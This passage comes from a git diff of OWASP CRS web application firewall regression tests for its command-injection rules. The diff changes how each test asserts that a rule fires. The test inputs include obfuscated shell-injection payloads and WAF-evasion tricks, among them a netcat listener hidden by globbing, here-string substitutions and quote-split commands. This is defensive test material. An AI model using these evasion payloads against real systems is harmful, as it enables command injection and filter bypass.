[932236] - test_id: 60 desc: "Known false positive with `Wall` at start of string (expected failure)" stages: @@ -1041,7 +1100,8 @@ tests: data: | sentence=Wall Street\\xe2\\x80\\x99s benchmark stock index struck an all-time high on Tuesday. output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 61 desc: "Known false positive with `Mount` at start of string (expected failure)" stages: @@ -1058,7 +1118,8 @@ tests: data: | sentence=Mount Airy basketball coach Bryan Hayes lectures his team during a third-quarter timeout. output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 62 desc: "Fixed false positive with `As` at start of string" stages: @@ -1075,7 +1136,8 @@ tests: data: | sentence=As you near your last year of trick or treating, though, sometimes jokes aren't enough. output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 63 desc: "Fixed false positive with `At` at start of string" stages: @@ -1092,7 +1154,8 @@ tests: data: | sentence=At any moment we can make a decision to change. output: - no_log_contains: id "932236" + log: + no_expect_ids: [932236] - test_id: 64 desc: "Block `nohup` prefix" stages: @@ -1109,7 +1172,8 @@ tests: data: | code=nohup ifconfig output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 65 desc: "Block ad-hoc ansible commands" stages: @@ -1126,7 +1190,8 @@ tests: data: | code=ansible all -m ping output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 66 desc: "Block ansible config dump command" stages: @@ -1143,7 +1208,8 @@ tests: data: | code=ansible-config dump output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 67 desc: "Block installing collections from ansible galaxy" stages: @@ -1160,7 +1226,8 @@ tests: data: | code=ansible-galaxy collection install community.general output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 68 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -1177,7 +1244,8 @@ tests: data: | code=ansible-console output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 69 desc: "Block ansible-doc command" stages: @@ -1194,7 +1262,8 @@ tests: data: | code=ansible-doc plugin ping output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 70 desc: "Block dumping ansible inventory file and variables" stages: @@ -1211,7 +1280,8 @@ tests: data: | code=ansible-inventory --list output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 71 desc: "Block ansible pull from remote repository" stages: @@ -1228,7 +1298,8 @@ tests: data: | code=ansible-pull --url example.com output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 72 desc: "Block decrypting ansible secrets" stages: @@ -1245,7 +1316,8 @@ tests: data: | code=ansible-vault decrypt secret output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 73 desc: "Block execution of ansible playbooks" stages: @@ -1262,7 +1334,8 @@ tests: data: | code=ansible-playbook site.yml output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 74 desc: "Block decryption of secrets with chef-vault" stages: @@ -1279,7 +1352,8 @@ tests: data: | code=chef-vault -i secret output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 75 desc: "Block execution of chef-shell command" stages: @@ -1296,7 +1370,8 @@ tests: data: | code=chef-shell output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 76 desc: "Block execution chef recipie book" stages: @@ -1313,7 +1388,8 @@ tests: data: | code=chef-run all recipie.rb output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 77 desc: "Block execution chef recipie book against a specific node" stages: @@ -1330,7 +1406,8 @@ tests: data: | code=chef-client -t 1.1.1.1 output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 78 desc: "Block execution chef command" stages: @@ -1347,7 +1424,8 @@ tests: data: | code=chef report nodes output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 79 desc: "Block execution of visudo" stages: @@ -1364,7 +1442,8 @@ tests: data: | code=visudo output: - log_contains: id "932236" + log: + expect_ids: [932236] - test_id: 80 desc: "Block execution of CrowdSec cscli" stages: @@ -1381,4 +1460,5 @@ tests: data: | code=cscli alerts list output: - log_contains: id "932236" + log: + expect_ids: [932236] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml index 4b3e14f8f..3676f2a3a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml @@ -15,7 +15,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 2 stages: - input: @@ -29,7 +30,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 3 stages: - input: @@ -43,7 +45,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 4 stages: - input: @@ -57,7 +60,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 5 stages: - input: @@ -71,7 +75,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 6 stages: - input: @@ -86,7 +91,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 7 stages: - input: @@ -101,7 +107,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 8 stages: - input: @@ -116,7 +123,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 9 stages: - input: @@ -131,7 +139,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 10 stages: - input: @@ -146,7 +155,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 11 desc: "9323HNQU - should not be detected at PL 2" stages: @@ -163,7 +173,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 12 desc: "9323HNQU - should not be detected at PL 2" stages: @@ -180,7 +191,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 13 desc: "FP with word comment" stages: @@ -195,7 +207,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932237" + log: + no_expect_ids: [932237] - test_id: 14 desc: "FP with word settings" stages: @@ -210,7 +223,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932237" + log: + no_expect_ids: [932237] - test_id: 15 stages: - input: @@ -225,7 +239,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 16 stages: - input: @@ -239,7 +254,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: "id \"932237\"" + log: + no_expect_ids: [932237] - test_id: 17 desc: "Block env command with arguments" stages: @@ -254,7 +270,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 18 desc: "Block env command with arguments" stages: @@ -270,7 +287,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: "id \"932237\"" + log: + expect_ids: [932237] - test_id: 19 desc: "Block ad-hoc ansible commands" stages: @@ -285,7 +303,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 20 desc: "Block ansible config dump command" stages: @@ -300,7 +319,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 21 desc: "Block installing collections from ansible galaxy" stages: @@ -315,7 +335,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 22 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -330,7 +351,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 23 desc: "Block ansible-doc command" stages: @@ -345,7 +367,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 24 desc: "Block dumping ansible inventory file and variables" stages: @@ -360,7 +383,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 25 desc: "Block ansible pull from remote repository" stages: @@ -375,7 +399,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 26 desc: "Block decrypting ansible secrets" stages: @@ -390,7 +415,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 27 desc: "Block execution of ansible playbooks" stages: @@ -405,7 +431,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 28 desc: "Block decryption of secrets with chef-vault" stages: @@ -420,7 +447,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 29 desc: "Block execution of chef-shell command" stages: @@ -435,7 +463,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 30 desc: "Block execution chef recipie book" stages: @@ -450,7 +479,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 31 desc: "Block execution chef recipie book against a specific node" stages: @@ -465,7 +495,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 32 desc: "Block execution chef command" stages: @@ -480,7 +511,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 33 desc: "Block execution of visudo" stages: @@ -495,7 +527,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] - test_id: 34 desc: "Block execution of CrowdSec cscli" stages: @@ -510,4 +543,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932237" + log: + expect_ids: [932237] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml index 5bbd8705b..1bf4cbecd 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml @@ -18,7 +18,8 @@ tests: code=;vi dddd +silent\\ \!whoami +wq version: HTTP/1.0 output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 2 desc: "9323HNQU" stages: @@ -35,7 +36,8 @@ tests: code=;vi -c:\!pwd version: HTTP/1.0 output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 3 desc: "Block evasion using here string" stages: @@ -52,7 +54,8 @@ tests: data: | code=;`cat<<<who` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 4 desc: "Block evasion using here string with space" stages: @@ -69,7 +72,8 @@ tests: data: | code=;`cat<<< who` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 5 desc: "Block evasion using here string with single quotes" stages: @@ -86,7 +90,8 @@ tests: data: | code=;`cat<<<'who'` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 6 desc: "Block evasion using here string with double quotes" stages: @@ -103,7 +108,8 @@ tests: data: | code=;`cat<<<"who"` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 7 desc: "Block evasion using here string with command substitution" stages: @@ -120,7 +126,8 @@ tests: data: | code=;`cat<<<$(who)` output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 8 desc: "Block `time` prefix" stages: @@ -137,7 +144,8 @@ tests: data: | code=time who output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 9 desc: "Block `strace` prefix" stages: @@ -154,7 +162,8 @@ tests: data: | code=strace who output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] - test_id: 10 desc: "Block `nohup` prefix" stages: @@ -171,4 +180,5 @@ tests: data: | code=nohup who output: - log_contains: "id \"932238\"" + log: + expect_ids: [932238] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml index f692a7779..99fb9ae84 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932239.yaml @@ -21,7 +21,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 2 desc: "Unix RCE in request headers - uppercase" stages: @@ -36,7 +37,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 3 desc: System Command Injection (932239) from old modsec regressions stages: @@ -55,7 +57,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 4 desc: System Command Injection (932239) from old modsec regressions stages: @@ -74,7 +77,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 5 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: @@ -92,7 +96,8 @@ tests: uri: "/post" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 6 desc: System Command Injection (932239) from old modsec regressions stages: @@ -112,7 +117,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 7 desc: System Command Injection (932239) from old modsec regressions stages: @@ -132,7 +138,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 8 desc: True Positive Fix Test 1 ISO-8859-2, ISO-8859-3, ISO-8859-4, ISO-8859-5, ISO-8859-6, ISO-8859-7, ISO-8859-8, ISO-8859-10, ISO-8859-14, ISO-8859-15 are affected because the chars are encoded as decimal html %26%238222%3B and %26%238221%3B entities stages: @@ -151,7 +158,8 @@ tests: uri: "/post" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 9 desc: "False negative report - user agent" stages: @@ -166,7 +174,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 10 desc: "Negative test on known user-agent" stages: @@ -183,7 +192,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 11 desc: "Negative test on known user-agent" stages: @@ -200,7 +210,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 12 desc: "Negative test on known user-agent" stages: @@ -217,7 +228,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 13 desc: "Negative test on known user-agent" stages: @@ -234,7 +246,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 14 desc: "Negative test on known user-agent" stages: @@ -251,7 +264,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 15 desc: "Negative test on known user-agent" stages: @@ -268,7 +282,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 16 desc: "Negative test on known user-agent" stages: @@ -285,7 +300,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 17 desc: "Negative test on known user-agent" stages: @@ -302,7 +318,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 18 desc: "IXMZUXBG" stages: @@ -317,7 +334,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 19 desc: "IXMZUXBG" stages: @@ -333,7 +351,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 20 desc: "FP with word comment" stages: @@ -348,7 +367,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 21 desc: "FP with word settings" stages: @@ -363,7 +383,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 22 desc: "FP with word environment" stages: @@ -378,7 +399,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 23 desc: "FP with word environment" stages: @@ -394,7 +416,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 24 desc: "FP with word performance" stages: @@ -409,7 +432,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 25 desc: "FP with word performance" stages: @@ -425,7 +449,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - no_log_contains: id "932239" + log: + no_expect_ids: [932239] - test_id: 26 desc: "Block execution of env command with arguments" stages: @@ -440,7 +465,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 27 desc: "Block execution of env command with arguments" stages: @@ -456,7 +482,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 28 desc: "Block execution of perf command with arguments" stages: @@ -471,7 +498,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 29 desc: "Block execution of perf command with arguments" stages: @@ -487,7 +515,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 30 desc: "Block evasion using here string" stages: @@ -502,7 +531,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 31 desc: "Block evasion using here string with space" stages: @@ -517,7 +547,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 32 desc: "Block evasion using here string with single quotes" stages: @@ -532,7 +563,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 33 desc: "Block evasion using here string with double quotes" stages: @@ -547,7 +579,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 34 desc: "Block evasion using here string with command substitution" stages: @@ -562,7 +595,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 35 desc: "Block `time` prefix" stages: @@ -577,7 +611,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 36 desc: "Block `strace` prefix" stages: @@ -592,7 +627,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 37 desc: "Block `nohup` prefix" stages: @@ -607,7 +643,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 38 desc: "Block ad-hoc ansible commands" stages: @@ -622,7 +659,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 39 desc: "Block ansible config dump command" stages: @@ -637,7 +675,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 40 desc: "Block installing collections from ansible galaxy" stages: @@ -652,7 +691,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 41 desc: "Block ad-hoc ansible commands using ansible-console" stages: @@ -667,7 +707,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 42 desc: "Block ansible-doc command" stages: @@ -682,7 +723,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 43 desc: "Block dumping ansible inventory file and variables" stages: @@ -697,7 +739,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 44 desc: "Block ansible pull from remote repository" stages: @@ -712,7 +755,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 45 desc: "Block decrypting ansible secrets" stages: @@ -727,7 +771,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 46 desc: "Block execution of ansible playbooks" stages: @@ -742,7 +787,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 47 desc: "Block decryption of secrets with chef-vault" stages: @@ -757,7 +803,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 48 desc: "Block execution of chef-shell command" stages: @@ -772,7 +819,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 49 desc: "Block execution chef recipie book" stages: @@ -787,7 +835,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 50 desc: "Block execution chef recipie book against a specific node" stages: @@ -802,7 +851,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 51 desc: "Block execution chef command" stages: @@ -817,7 +867,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 52 desc: "Block execution of visudo" stages: @@ -832,7 +883,8 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] - test_id: 53 desc: "Block execution of CrowdSec cscli" stages: @@ -847,4 +899,5 @@ tests: uri: "/post" version: HTTP/1.0 output: - log_contains: id "932239" + log: + expect_ids: [932239] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml index 911e82852..bef2ffde4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml @@ -20,7 +20,8 @@ tests: cmd=garb=adduse[r];$garb pizza version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 2 desc: 'globbing technique 2: {n$u\c$u,-nlvp,777} (BB X)' stages: @@ -37,7 +38,8 @@ tests: cmd={n$u\c$u,-nlvp,777} version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 3 desc: 'globbing technique 3: una$$me -a in cookies (BB S01X1GRV)' stages: @@ -53,7 +55,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 4 desc: 'globbing technique 4: uname$u -a (BB S01X1GRV)' stages: @@ -69,7 +72,8 @@ tests: uri: "/get" version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 5 desc: 'vars + spacing: v="u";cu$v\\r\l google.com (BB X)' stages: @@ -86,7 +90,8 @@ tests: cmd=v='u';cu$v\\r\l google.com version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 6 desc: 'vars + spacing: non-existing vars: cu$@rl (BB X)' stages: @@ -103,7 +108,8 @@ tests: cmd=cu$@rl google.com version: HTTP/1.1 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 7 desc: "Negative test on German numbering - Schauen Sie sich diese Zahl an:1'000'000" stages: @@ -122,7 +128,8 @@ tests: text=Schauen%20Sie%20sich%20diese%20Zahl%20an%3A%201%27000%27000 version: HTTP/1.1 output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 8 desc: "Negative test on WordPress like args" stages: @@ -141,7 +148,8 @@ tests: data%5Bwp-refresh-post-lock%5D%5Block%5D=1667487208%3A1&data%5Bwp-refresh-post-lock%5D%5Bpost_id%5D=1&interval=60&_nonce=25ed3b910d&action=heartbeat&screen_id=post&has_focus=false version: HTTP/1.1 output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 9 desc: "Unix Command Injection - python version bypass test" stages: @@ -157,7 +165,8 @@ tests: uri: '/get?cmd=""p""y""t""h""o""n""3"".""1""0""%20""c""m""d""' version: HTTP/1.0 output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 10 desc: Backticks command subtition WAF evasion stages: @@ -172,7 +181,8 @@ tests: uri: "/get?x=ping``%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 11 desc: Backticks command subtition WAF evasion (mid command) stages: @@ -187,7 +197,8 @@ tests: uri: "/get?x=pi``ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 12 desc: Dollar sign command subtition WAF evasion stages: @@ -202,7 +213,8 @@ tests: uri: "/get?x=ping$()%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 13 desc: Dollar sign command subtition WAF evasion (mid command) stages: @@ -217,7 +229,8 @@ tests: uri: "/get?x=pi$()ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 14 desc: Process subtition '<()' WAF evasion (mid command) stages: @@ -232,7 +245,8 @@ tests: uri: "/get?x=pi<()ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 15 desc: Process subtition '>()' WAF evasion (mid command) stages: @@ -247,7 +261,8 @@ tests: uri: "/get?x=pi>()ng%20127.0.0.1" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 16 desc: FP against single quote inside string stages: @@ -264,7 +279,8 @@ tests: payload=All told, people were taken with the concept of Stadia, but the execution just didn't work. version: "HTTP/1.1" output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 17 desc: "Detect quote evasion: kill '-'9" stages: @@ -281,7 +297,8 @@ tests: payload=kill '-'9 version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] - test_id: 18 desc: "False positive against quote evasion with two quotes" stages: @@ -298,7 +315,8 @@ tests: payload=An affordable housing advocate says the city's rewrite of the land development code would boost affordable housing, but there's room to do more. version: "HTTP/1.1" output: - no_log_contains: id "932240" + log: + no_expect_ids: [932240] - test_id: 19 desc: "Detect quote evasion: py''thon" stages: @@ -315,4 +333,5 @@ tests: payload=py''thon -c "print('attack')" version: "HTTP/1.1" output: - log_contains: id "932240" + log: + expect_ids: [932240] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index ccb8dfd65..70d0cd95e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml @@ -21,7 +21,8 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932250" + log: + no_expect_ids: [932250] - test_id: 2 stages: - input: @@ -36,23 +37,24 @@ tests: uri: "/post" version: "HTTP/1.1" output: - no_log_contains: id "932250" - # FIXME: 932150 already had this false positive. Fix after rework - # - test_id: 3 - # stages: - # - input: - # dest_addr: "127.0.0.1" - # method: "POST" - # port: 80 - # headers: - # User-Agent: "OWASP CRS test agent" - # Host: "localhost" - # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' - # uri: "/post" - # version: "HTTP/1.1" - # output: - # no_log_contains: id "932250" + log: + no_expect_ids: [932250] + - test_id: 3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=tar is a dark brown or black bituminous usually odorous viscous liquid' + uri: "/post" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932250] - test_id: 4 desc: Negative test for excluded command `c99` stages: @@ -68,7 +70,8 @@ tests: uri: "/post" version: 